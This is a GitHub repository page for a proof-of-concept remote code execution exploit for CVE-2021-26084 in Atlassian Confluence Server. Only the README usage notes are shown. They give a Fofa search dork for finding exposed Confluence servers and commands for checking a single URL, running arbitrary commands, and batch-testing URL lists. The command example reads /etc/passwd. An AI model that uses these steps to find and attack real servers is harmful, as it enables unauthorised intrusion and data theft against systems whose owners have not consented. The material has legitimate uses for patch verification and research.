Skip to content

0xf4n9x/CVE-2021-26084

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 
 
 

Repository files navigation

CVE-2021-26084

CVE-2021-26084 Remote Code Execution on Confluence Servers.

burp

Dork

Fofa:

app="ATLASSIAN-Confluence"

Usage

Show help information.

python PoC.py

help

Vulnerability verification for individual websites.

python PoC.py -u https://1.1.1.1

url

Command execution.

python PoC.py -u https://1.1.1.1 -e 'cat /etc/passwd'

rce

Batch testing.

python PoC.py -f urls.txt

file

Reference

About

CVE-2021-26084 Remote Code Execution on Confluence Servers

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages